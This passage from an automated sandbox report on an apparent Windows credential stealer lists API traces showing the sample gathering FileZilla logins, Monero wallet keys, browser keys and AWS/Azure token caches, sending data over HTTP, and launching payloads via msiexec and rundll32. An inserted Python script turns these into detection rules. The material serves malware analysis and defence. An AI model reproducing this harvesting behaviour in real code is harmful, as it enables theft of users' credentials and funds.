                          • lstrcat.KERNEL32(?,00631698), ref: 00620626
                          • lstrcat.KERNEL32(?,0063169C), ref: 00620635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006159F8
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00615A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00615B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0111E808,00000000,?,0111A270,00000000,?,00631A1C), ref: 00615E71
                          • lstrlen.KERNEL32(00000000), ref: 00615E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00615E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00615E9A
                          • lstrlen.KERNEL32(00000000), ref: 00615EAF
                          • lstrlen.KERNEL32(00000000), ref: 00615ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00615EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00615F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00615F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00615F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00615FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00615FBD
                          • HttpOpenRequestA.WININET(00000000,0111E898,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00615BF8
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • InternetCloseHandle.WININET(00000000), ref: 00615FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0061D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0061D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D208
                          • lstrcat.KERNEL32(?,00631478), ref: 0061D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D22A
                          • lstrcat.KERNEL32(?,0063147C), ref: 0061D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D24C
                          • lstrcat.KERNEL32(?,00631480), ref: 0061D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D26E
                          • lstrcat.KERNEL32(?,00631484), ref: 0061D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D290
                          • lstrcat.KERNEL32(?,00631488), ref: 0061D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D2B2
                          • lstrcat.KERNEL32(?,0063148C), ref: 0061D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D2D4
                          • lstrcat.KERNEL32(?,00631490), ref: 0061D2E3
                            • Part of subcall function 0062A820: lstrlen.KERNEL32(00614F05,?,?,00614F05,00630DDE), ref: 0062A82B
                            • Part of subcall function 0062A820: lstrcpy.KERNEL32(00630DDE,00000000), ref: 0062A885
                          • lstrlen.KERNEL32(?), ref: 0061D32A
                          • lstrlen.KERNEL32(?), ref: 0061D339
                            • Part of subcall function 0062AA70: StrCmpCA.SHLWAPI(01119008,0061A7A7,?,0061A7A7,01119008), ref: 0062AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0061D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0111D128,00000000,?,0063144C,00000000,?,?), ref: 0061CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0061CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0061CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0061CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0061CAD9
                          • StrStrA.SHLWAPI(?,0111D350,00630B52), ref: 0061CAF7
                          • StrStrA.SHLWAPI(00000000,0111D170), ref: 0061CB1E
                          • StrStrA.SHLWAPI(?,0111DD80,00000000,?,00631458,00000000,?,00000000,00000000,?,011190C8,00000000,?,00631454,00000000,?), ref: 0061CCA2
                          • StrStrA.SHLWAPI(00000000,0111DC40), ref: 0061CCB9
                            • Part of subcall function 0061C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0061C871
                            • Part of subcall function 0061C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0061C87C
                          • StrStrA.SHLWAPI(?,0111DC40,00000000,?,0063145C,00000000,?,00000000,01118FB8), ref: 0061CD5A
                          • StrStrA.SHLWAPI(00000000,01119238), ref: 0061CD71
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B46), ref: 0061C943
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B47), ref: 0061C957
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B4E), ref: 0061C978
                          • lstrlen.KERNEL32(00000000), ref: 0061CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0061CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: b2155d6462819be2308628a542d718876a7b8cca960611097330d835a2d1521f
                          • Instruction ID: 8746e57472720652222d8c7215248d290cb6cdf49b31c6848c62453ae59708ee
                          • Opcode Fuzzy Hash: b2155d6462819be2308628a542d718876a7b8cca960611097330d835a2d1521f
                          • Instruction Fuzzy Hash: 90E1FD71810518ABDB58EBE0EC91FEEB77ABF18300F40415DF10666192DF746A4ACF6A
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0111B3C8,00000000,00020019,00000000,006305B6), ref: 006283A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00628426
                          • wsprintfA.USER32 ref: 00628459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0062847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628499
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: 4b0288958ddd9b052da887074d1462bfba2868f78613cd38367b1370b75f1132
                          • Instruction ID: 2c69d5d5e254778310fc332dd3b5718cca196bcfa93145abf75e4cba1155f749
                          • Opcode Fuzzy Hash: 4b0288958ddd9b052da887074d1462bfba2868f78613cd38367b1370b75f1132
                          • Instruction Fuzzy Hash: 51811E719116289FDB68DB90DC91FEAB7B9FF08700F0082D8E109A6180DF756B85CF95
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00624DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00624DCD
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 0062492C
                            • Part of subcall function 00624910: FindFirstFileA.KERNEL32(?,?), ref: 00624943
                          • lstrcat.KERNEL32(?,00000000), ref: 00624E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00624E59
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                            • Part of subcall function 00624910: FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                            • Part of subcall function 00624910: FindClose.KERNEL32(000000FF), ref: 00624B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00624EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00624EE5
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 006249B0
                            • Part of subcall function 00624910: StrCmpCA.SHLWAPI(?,006308D2), ref: 006249C5
                            • Part of subcall function 00624910: wsprintfA.USER32 ref: 006249E2
                            • Part of subcall function 00624910: PathMatchSpecA.SHLWAPI(?,?), ref: 00624A1E
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,0111E8D8), ref: 00624A4A
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,00630FF8), ref: 00624A5C
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,?), ref: 00624A70
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,00630FFC), ref: 00624A82
                            • Part of subcall function 00624910: lstrcat.KERNEL32(?,?), ref: 00624A96
                            • Part of subcall function 00624910: CopyFileA.KERNEL32(?,?,00000001), ref: 00624AAC
                            • Part of subcall function 00624910: DeleteFileA.KERNEL32(?), ref: 00624B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 6a037c18a1aa8bec86d7896ee6dd1a9bda42d47c65f16684e7e625480b1bd3cf
                          • Instruction ID: 237010df2b45fac6725d49d21cdbcbff7056318df944938cc05266560aaf14f7
                          • Opcode Fuzzy Hash: 6a037c18a1aa8bec86d7896ee6dd1a9bda42d47c65f16684e7e625480b1bd3cf
                          • Instruction Fuzzy Hash: 3F41A3BA94021867D754F770EC87FED733AAB25700F004558B649660C1EEB55BCD8B92
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0062906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 50af01bdc282911655cddf7fcb3aa770f2b58c73c010c5b2fa6400a42b899cb6
                          • Instruction ID: 01161db6a16ae791ae8ac392a3f2d9b4d7b5ac5ac73cc1c721e05b611d526ed6
                          • Opcode Fuzzy Hash: 50af01bdc282911655cddf7fcb3aa770f2b58c73c010c5b2fa6400a42b899cb6
                          • Instruction Fuzzy Hash: 8571FEB5910208ABDB18DFE4DC89FEDB7B9BF48701F108618F615A7290DB38A945CF61
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 006231C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0062335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 006234EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 3433475ee1c4a7cf01ba70c41f9e97a499faf4aa9f8dcfc7187bfa3bf1e637bb
                          • Instruction ID: b965b1d04fcc0c537967228d16718465375083c3d65f64deeb7b58971a000d66
                          • Opcode Fuzzy Hash: 3433475ee1c4a7cf01ba70c41f9e97a499faf4aa9f8dcfc7187bfa3bf1e637bb
                          • Instruction Fuzzy Hash: A2120F718105289BDB49EBE0EC92FDDB73AAF14300F50415DF50666192EFB42B4ACF9A
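The three function traces above describe two behaviours a defender can hunt for directly: the file-harvesting routine that appends \.aws\, \.azure\ and \.IdentityService\ (msal.cache) to a resolved profile folder and builds \Monero\wallet.keys before copying files out, and the ShellExecuteEx routine that assembles msiexec /i "<file>.msi" /passive and rundll32 <file>.dll launches. The script below is an added example, not part of the Joe Sandbox output, that turns those strings into checks and runs them over constructed endpoint events. The event schema (flat dicts with type, image, path or command_line) and the allow-list of expected readers are assumptions for the example; the report lists the command-line fragments but not the assembled lines, so the exact spacing in the regexes is also assumed.

```python
"""Hunting check built from the API traces in this report (added example, not
part of the Joe Sandbox output). The event schema below is an assumption for the
example: flat dicts with 'type', 'image', 'path' or 'command_line' keys, as an
EDR or Sysmon-to-JSON pipeline might emit. All sample events are constructed."""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# File locations taken from the report's strings: the sample appends \.aws\,
# \.azure\ and \.IdentityService\ (msal.cache) to a resolved profile folder and
# builds \Monero\wallet.keys. Only the suffix is matched, so the prefix does not matter.
SENSITIVE_PATH_PATTERNS = [
    re.compile(r"\\\.aws\\", re.I),
    re.compile(r"\\\.azure\\", re.I),
    re.compile(r"\\\.identityservice\\", re.I),
    re.compile(r"\\msal\.cache$", re.I),
    re.compile(r"\\monero\\wallet\.keys$", re.I),
]

# Processes expected to read those files. Assumption for the example; an
# operator tunes this list per estate.
EXPECTED_READERS = {
    "aws.exe", "az.exe", "azcopy.exe", "python.exe", "pwsh.exe",
    "powershell.exe", "code.exe", "monero-wallet-gui.exe",
}

# Launch shapes from the ShellExecuteEx block: msiexec /i "<file>.msi" /passive
# and rundll32 <file>.dll. The report lists the fragments, not the assembled
# command lines, so the exact spacing here is an assumption. rundll32 is only
# flagged for a DLL under \Users\ to keep system DLL launches out of the results.
MSIEXEC_PASSIVE_RE = re.compile(r'msiexec\.exe\s+/i\s+"[^"]+\.msi"\s+/passive', re.I)
RUNDLL32_USER_DLL_RE = re.compile(r'rundll32\.exe\s+"?[^"\s]*\\users\\[^"\s]+\.dll', re.I)

Finding = Tuple[str, str]


def check_file_read(event: Dict[str, str]) -> Optional[Finding]:
    """Credential or wallet file read by a process outside the allow-list."""
    if event.get("type") != "file_read":
        return None
    path = event["path"]
    if not any(p.search(path) for p in SENSITIVE_PATH_PATTERNS):
        return None
    image = ntpath.basename(event["image"]).lower()
    if image in EXPECTED_READERS:
        return None
    return ("sensitive_read", f"{image} -> {path}")


def check_process_create(event: Dict[str, str]) -> Optional[Finding]:
    """Second-stage launch through msiexec or rundll32 as seen in the report."""
    if event.get("type") != "process_create":
        return None
    cmd = event["command_line"]
    if MSIEXEC_PASSIVE_RE.search(cmd):
        return ("msiexec_passive_install", cmd)
    if RUNDLL32_USER_DLL_RE.search(cmd):
        return ("rundll32_user_dll", cmd)
    return None


def hunt(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every check over every event and collect the hits in event order."""
    findings: List[Finding] = []
    for event in events:
        for check in (check_file_read, check_process_create):
            hit = check(event)
            if hit is not None:
                findings.append(hit)
    return findings


STAGER = r"C:\Users\u\AppData\Local\Temp\file.exe"
# Constructed sample telemetry: five events that should fire and three that should not.
SAMPLE_EVENTS = [
    {"type": "file_read", "image": STAGER, "path": r"C:\Users\u\.aws\credentials"},
    {"type": "file_read", "image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",
     "path": r"C:\Users\u\.aws\credentials"},
    {"type": "file_read", "image": STAGER,
     "path": r"C:\Users\u\AppData\Local\.IdentityService\msal.cache"},
    {"type": "file_read", "image": STAGER, "path": r"C:\Users\u\Documents\notes.txt"},
    {"type": "file_read", "image": STAGER, "path": r"C:\Users\u\Documents\Monero\wallet.keys"},
    {"type": "process_create",
     "command_line": r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\upd.msi" /passive'},
    {"type": "process_create",
     "command_line": r"C:\Windows\system32\rundll32.exe C:\Users\u\AppData\Local\Temp\upd.dll,Start"},
    {"type": "process_create",
     "command_line": r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The file-read check matches on path suffix only because the trace shows the sample concatenating a folder it resolves at runtime with the fixed \.aws\, \.azure\ and \.IdentityService\ fragments, so the prefix on a victim host is not fixed. The rundll32 rule is restricted to DLLs under \Users\ on purpose: unrestricted rundll32 matching is too noisy to be useful, and a dropped second stage lands in a user-writable directory.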
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 00616280: InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                            • Part of subcall function 00616280: StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                            • Part of subcall function 00616280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                            • Part of subcall function 00616280: HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                            • Part of subcall function 00616280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                            • Part of subcall function 00616280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625318
                          • lstrlen.KERNEL32(00000000), ref: 0062532F
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00625364
                          • lstrlen.KERNEL32(00000000), ref: 00625383
                          • lstrlen.KERNEL32(00000000), ref: 006253AE
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 8e8de7d25d9682f20bc3b40b8ff9cd9cfefd4a9610a7a95a65650cf48f2daa1d
                          • Instruction ID: 10fbe79bd8fa23ffbffb4639ce4c59e15d1686670be61fff68a56ab5f6963423
                          • Opcode Fuzzy Hash: 8e8de7d25d9682f20bc3b40b8ff9cd9cfefd4a9610a7a95a65650cf48f2daa1d
                          • Instruction Fuzzy Hash: 275121709109589BCB58FFA0ED92AED777BAF14300F50401CF9066A191EF746B46CF9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 96d6dcd57843d21ec35a830cce19d5d45e321b2b8823432a2592fe04312464eb
                          • Instruction ID: 927cd81c297317ece8c42edfb4a2342ea36c7e4979bd201659cfa90d7db2f03f
                          • Opcode Fuzzy Hash: 96d6dcd57843d21ec35a830cce19d5d45e321b2b8823432a2592fe04312464eb
                          • Instruction Fuzzy Hash: 01C1E8B59012299BCB54EF60ECC9FEA737ABF64300F00459CF50A67141DB74AA85CF95
                          APIs
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 006242EC
                          • lstrcat.KERNEL32(?,0111E1B8), ref: 0062430B
                          • lstrcat.KERNEL32(?,?), ref: 0062431F
                          • lstrcat.KERNEL32(?,0111D3C8), ref: 00624333
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628D90: GetFileAttributesA.KERNEL32(00000000,?,00611B54,?,?,0063564C,?,?,00630E1F), ref: 00628D9F
                            • Part of subcall function 00619CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00619D39
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 006293C0: GlobalAlloc.KERNEL32(00000000,006243DD,006243DD), ref: 006293D3
                          • StrStrA.SHLWAPI(?,0111E218), ref: 006243F3
                          • GlobalFree.KERNEL32(?), ref: 00624512
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                            • Part of subcall function 00619AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                            • Part of subcall function 00619AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                            • Part of subcall function 00619AC0: LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 006244A3
                          • StrCmpCA.SHLWAPI(?,006308D1), ref: 006244C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006244D2
                          • lstrcat.KERNEL32(00000000,?), ref: 006244E5
                          • lstrcat.KERNEL32(00000000,00630FB8), ref: 006244F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: c9ec456cdd539017b1160a687b259fdb5f4e72df68c105e4e43fb2aa98987a78
                          • Instruction ID: 944d0200c85f2e133544ea07f7f5aafd15733faf32be6c2da36eafbc06efe5fe
                          • Opcode Fuzzy Hash: c9ec456cdd539017b1160a687b259fdb5f4e72df68c105e4e43fb2aa98987a78
                          • Instruction Fuzzy Hash: CD7185B6900618ABCB54EBA0EC95FEE737ABF48300F04459CF60597181EA74DB49CFA5
                          APIs
                            • Part of subcall function 006112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006112B4
                            • Part of subcall function 006112A0: RtlAllocateHeap.NTDLL(00000000), ref: 006112BB
                            • Part of subcall function 006112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006112D7
                            • Part of subcall function 006112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006112F5
                            • Part of subcall function 006112A0: RegCloseKey.ADVAPI32(?), ref: 006112FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0061134F
